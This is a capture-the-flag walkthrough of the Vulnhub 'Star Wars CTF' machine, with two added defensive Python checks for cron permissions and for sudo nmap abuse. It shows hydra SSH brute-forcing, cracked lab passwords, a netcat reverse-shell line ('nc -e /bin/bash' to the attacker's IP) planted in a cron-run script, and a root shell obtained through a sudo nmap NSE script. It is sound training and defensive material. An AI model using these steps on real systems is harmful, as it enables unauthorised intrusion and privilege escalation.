[VULNHUB] Star Wars CTF

Today we are going to hack the Vulnhub machine called Star Wars CTF. You can download it from the following link: Star Wars CTF


Enumeration


We start with an nmap scan to see which ports are open.

~ > nmap -A -p- 192.168.1.35                                                  
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 12:37 CEST
Nmap scan report for 192.168.1.35
Host is up (0.00067s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 4c:53:4d:b2:26:ee:a5:10:d4:be:99:84:2a:9a:aa:11 (RSA)
|   256 95:d7:a4:e0:74:63:4b:08:b0:a8:8c:dc:e1:f8:91:25 (ECDSA)
|_  256 1d:07:d1:3d:99:02:f0:04:ba:23:c3:a4:fd:0d:3d:91 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.90 seconds

At http://192.168.1.35/robots.txt we find:

Why does the Jedi Order keep checking the robots.txt file.
Might take a look at /r2d2
He is the real OG. 
We visit http://192.168.1.35/r2d2 and see that it contains a lot of text... We also download the two images shown on the front page at http://192.168.1.35.

~ > wget http://192.168.1.35/yoda.jpg
~ > wget http://192.168.1.35/yoda.png
They may contain some stego, so we search the web for "stego online"... We find the following site[1], and when we give it yoda.png it tells us that the real password is babyYoda123, but we have no login to go with it... We google for a Star Wars wordlist and find this one[2]. We download it and use it as a dictionary of logins together with the password we found earlier. Let's launch hydra!

~ > hydra -L starwars.txt -p babyYoda123 192.168.1.35 ssh -f 
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-10 19:25:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 217 login tries (l:217/p:1), ~14 tries per task
[DATA] attacking ssh://192.168.1.35:22/
[22][ssh] host: 192.168.1.35   login: han   password: babyYoda123
[STATUS] attack finished for 192.168.1.35 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-10 19:25:20

We have the password for the user "han". Let's log in!

Low Shell



~ > ssh han@192.168.1.35                                                      
han@192.168.1.35's password: 
Linux starwars 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 23 08:18:42 2020 from ::1
han@starwars:~$ id
uid=1000(han) gid=1000(han) groups=1000(han)

We explore the system a bit...

han@starwars:~$ ls -la
total 32
drwxr-xr-x 4 han  han  4096 Jul 23 08:11 .
drwxr-xr-x 5 root root 4096 Jul 23 08:18 ..
-rw------- 1 han  han   483 Jul 24 20:42 .bash_history
-rw-r--r-- 1 han  han   220 Apr 18  2019 .bash_logout
-rw-r--r-- 1 han  han  3526 Apr 18  2019 .bashrc
drwx------ 3 han  han  4096 Jul 23 08:02 .gnupg
-rw-r--r-- 1 han  han   807 Apr 18  2019 .profile
drwxr-xr-x 2 han  han  4096 Jul 24 20:27 .secrets
han@starwars:~$ cd .secrets
han@starwars:~/.secrets$ ls -la
total 12
drwxr-xr-x 2 han han 4096 Jul 24 20:27 .
drwxr-xr-x 4 han han 4096 Jul 23 08:11 ..
-rw-r----- 1 han han   22 Jul 24 20:28 note.txt
han@starwars:~/.secrets$ cat note.txt
Anakin is a cewl kid.
han@starwars:~/.secrets$ 

We see there is a note.txt in the .secrets directory. It uses two interesting words: "Anakin" and "cewl". On one hand, we can see that the user skywalker belongs to the "anakin" group.

han@starwars:~/.secrets$ cat /etc/group
anakin:x:2000:Darth,skywalker

On the other hand, we use the "cewl" tool, which builds ("prepares") wordlists from a website, against the text-heavy page we saw earlier.

cewl http://192.168.1.35/r2d2 > dic2.txt

Once we have everything, we use hydra to see if we can get skywalker's password with the dictionary we just built.

~ > hydra -l skywalker -P dic2.txt 192.168.1.35 ssh
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-10 19:31:18
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 328 login tries (l:1/p:328), ~21 tries per task
[DATA] attacking ssh://192.168.1.35:22/
[22][ssh] host: 192.168.1.35   login: skywalker   password: tatooine

Got it :) We log in as skywalker.

~ > ssh skywalker@192.168.1.35                                                
skywalker@192.168.1.35's password: 
Linux starwars 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jul 24 20:09:34 2020 from 192.168.0.118
skywalker@starwars:~$ id
uid=1001(skywalker) gid=1001(skywalker) groups=1001(skywalker),2000(anakin)

We explore the system a bit.

skywalker@starwars:~$ cd .secrets/
skywalker@starwars:~/.secrets$ ls
note.txt
skywalker@starwars:~/.secrets$ cat note.txt 
Darth must take up the job of being a good father

This time the "interesting" word in the note is job. We keep exploring...

skywalker@starwars:~/.secrets$ cd /home
skywalker@starwars:/home$ ls
Darth  han  skywalker
skywalker@starwars:/home$ cd Darth
skywalker@starwars:/home/Darth$ ls -la
total 44
drwxr-xr-x 5 Darth Darth 4096 Jul 24 21:03 .
drwxr-xr-x 5 root  root  4096 Jul 23 08:18 ..
-rw------- 1 Darth Darth 2351 Jul 24 22:33 .bash_history
-rw-r--r-- 1 Darth Darth  220 Apr 18  2019 .bash_logout
-rw-r--r-- 1 Darth Darth 3526 Apr 18  2019 .bashrc
drwx------ 3 Darth Darth 4096 Jul 23 08:20 .gnupg
-rw------- 1 Darth Darth   42 Jul 24 21:03 .lesshst
drwxr-xr-x 3 Darth Darth 4096 Jul 24 19:43 .local
-rw-r--r-- 1 Darth Darth  807 Apr 18  2019 .profile
drwxr-xr-x 2 Darth Darth 4096 Jul 24 20:13 .secrets
-rw-r--r-- 1 Darth Darth   66 Jul 24 19:43 .selected_editor
skywalker@starwars:/home/Darth$ cd .secrets
skywalker@starwars:/home/Darth/.secrets$ ls -la
total 12
drwxr-xr-x 2 Darth Darth  4096 Jul 24 20:13 .
drwxr-xr-x 5 Darth Darth  4096 Jul 24 21:03 ..
-rwxrw-r-- 1 Darth anakin  105 Jul 24 20:10 evil.py

Inside Darth's home, in the .secrets folder, there is a Python script called evil.py. We have write permission on it (it is writable by the anakin group, which skywalker belongs to) and, given the hint in the previous note, it is most likely a script that runs every so often. The script contains:

skywalker@starwars:/home/Darth/.secrets$ cat evil.py
# Let the fear flow through you every single minute

fear = 1
anger = fear
hate = anger
suffering = hate

We modify it so that it gives us a reverse shell.

skywalker@starwars:/home/Darth/.secrets$ cat evil.py
import os
os.system("nc -e /bin/bash 192.168.1.59 5555")

We start nc listening...

~ > nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.59] from (UNKNOWN) [192.168.1.35] 34298

And after a moment:

~ > nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.59] from (UNKNOWN) [192.168.1.35] 34298
python -c 'import pty;pty.spawn("/bin/bash")'
Darth@starwars:~$ 
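The weak point here is a file that one user runs on a schedule but another user can edit (evil.py is mode rwxrw-r-- with group anakin). As an added example that is not part of the original writeup, this Python check parses a crontab and flags every referenced file that group or world can write to; the crontab text is constructed and the evil.py layout is recreated in a temporary directory so it runs anywhere.

```python
import os
import stat
import tempfile

# Constructed crontab text modelled on the hint in evil.py ("every single minute");
# HOME is filled in by demo() once the temporary home directory exists.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
* * * * * /usr/bin/python3 HOME/.secrets/evil.py
"""


def cron_script_paths(crontab_text):
    """Return every absolute path found in the command field of crontab lines."""
    paths = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # m h dom mon dow, then the command
        if len(fields) < 6:
            continue
        paths.extend(tok for tok in fields[5].split() if tok.startswith("/"))
    return paths


def writable_by_others(path):
    """True if group or world write bits are set, i.e. a non-owner can edit the file."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_cron_scripts(crontab_text):
    """List (path, mode) for cron-referenced files that someone other than the owner can modify."""
    findings = []
    for path in cron_script_paths(crontab_text):
        if os.path.isfile(path) and writable_by_others(path):
            findings.append((path, oct(stat.S_IMODE(os.stat(path).st_mode))))
    return findings


def demo(mode=0o764):
    """Recreate the evil.py layout in a temp dir (default mode rwxrw-r--, as on the box) and audit it."""
    with tempfile.TemporaryDirectory() as home:
        secrets = os.path.join(home, ".secrets")
        os.mkdir(secrets)
        script = os.path.join(secrets, "evil.py")
        with open(script, "w") as fh:
            fh.write("fear = 1\n")
        os.chmod(script, mode)
        return audit_cron_scripts(SAMPLE_CRONTAB.replace("HOME", home))
```

Run against a real system by feeding it the output of `crontab -l` for each user or the contents of /etc/cron.d; the fix for a hit is to make the file owner-writable only (chmod 755) or move it out of a shared-group directory.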

Privilege Escalation


Now we are Darth! Let's see whether we can do anything with sudo.

Darth@starwars:~$ sudo -l
sudo -l
Matching Defaults entries for Darth on starwars:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User Darth may run the following commands on starwars:
    (ALL) NOPASSWD: /usr/bin/nmap
Darth@starwars:~$ 

We can run nmap as root. In this case nmap does not accept the --interactive parameter, which we could otherwise use to escalate privileges. Instead, we will create an ".nse" script, pass it to nmap, and it will hand us a shell. We create the script (in Lua).

Darth@starwars:/tmp$ echo "os.execute(\"/bin/sh\")" > b.nse

We run it...

Darth@starwars:~$ sudo nmap --script=/tmp/b.nse
sudo nmap --script=/tmp/b.nse
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 09:20 EDT
# id
uid=0(root) gid=0(root) groups=0(root)
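From the defender's side, every sudo run like the one above is written to the auth log with the full command line, so the abuse is easy to spot. As an added example that is not part of the original writeup, this Python check flags sudo-to-root runs of nmap that load an NSE file from outside the bundled script directory; the log lines are constructed, and the bundled directory path is an assumption.

```python
import os
import re

# Constructed auth.log lines in sudo's log format, modelled on the sudo nmap step above.
SAMPLE_AUTH_LOG = """\
Sep 10 09:19:55 starwars sudo:    Darth : TTY=pts/0 ; PWD=/home/Darth ; USER=root ; COMMAND=/usr/bin/nmap -sn 192.168.1.0/24
Sep 10 09:20:03 starwars sudo:    Darth : TTY=pts/0 ; PWD=/home/Darth ; USER=root ; COMMAND=/usr/bin/nmap --script=/tmp/b.nse
Sep 10 09:21:10 starwars sudo:    Darth : TTY=pts/0 ; PWD=/home/Darth ; USER=root ; COMMAND=/usr/bin/nmap --script=http-title 192.168.1.35
Sep 10 09:22:42 starwars sudo:     root : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/apt update
"""

SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$")
# Where Debian's nmap package keeps its bundled NSE scripts (assumption for this example).
BUNDLED_NSE_DIR = "/usr/share/nmap/scripts/"


def foreign_nse_script(cmd):
    """Return the first --script argument that is a filesystem path outside the bundled NSE directory."""
    argv = cmd.split()
    if not argv or os.path.basename(argv[0]) != "nmap":
        return None
    for i, arg in enumerate(argv):
        if arg.startswith("--script="):
            value = arg.split("=", 1)[1]
        elif arg == "--script" and i + 1 < len(argv):
            value = argv[i + 1]
        else:
            continue
        # Bundled scripts are selected by name or category (http-title, default, ...);
        # a path means nmap runs whatever Lua is in that file, as root when under sudo.
        for item in value.split(","):
            if "/" in item and not item.startswith(BUNDLED_NSE_DIR):
                return item
    return None


def detect_nse_sudo_abuse(log_text):
    """Return (user, script) pairs for sudo runs of nmap as root that loaded a non-bundled NSE script."""
    hits = []
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        if not m or m.group("target") != "root":
            continue
        script = foreign_nse_script(m.group("cmd"))
        if script:
            hits.append((m.group("user"), script))
    return hits
```

The real fix is the sudoers rule itself: a NOPASSWD entry for a binary that can load scripts or spawn a shell is equivalent to granting root, so restrict it to specific arguments or drop it.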

root.txt



# cd /root
# cat flag.txt
    .-.
                      |_:_|
                     /(_Y_)\
.                   ( \/M\/ )
 '.               _.'-/'-'\-'._
   ':           _/.--'[[[[]'--.\_
     ':        /_'  : |::"| :  '.\
       ':     //   ./ |oUU| \.'  :\
         ':  _:'..' \_|___|_/ :   :|
           ':.  .'  |_[___]_|  :.':\
            [::\ |  :  | |  :   ; : \
             '-'   \/'.| |.' \  .;.' |
             |\_    \  '-'   :       |
             |  \    \ .:    :   |   |
             |   \    | '.   :    \  |
             /       \   :. .;       |
            /     |   |  :__/     :  \\
           |  |   |    \:   | \   |   ||
          /    \  : :  |:   /  |__|   /|
      snd |     : : :_/_|  /'._\  '--|_\
          /___.-/_|-'   \  \
                         '-'

I hope you liked it Padawan :)  # 

End


And with that we are root on the machine.

[1] https://stylesuxx.github.io/steganography/
[2] https://gist.github.com/bgilham/f1796d6eab8f283f64f4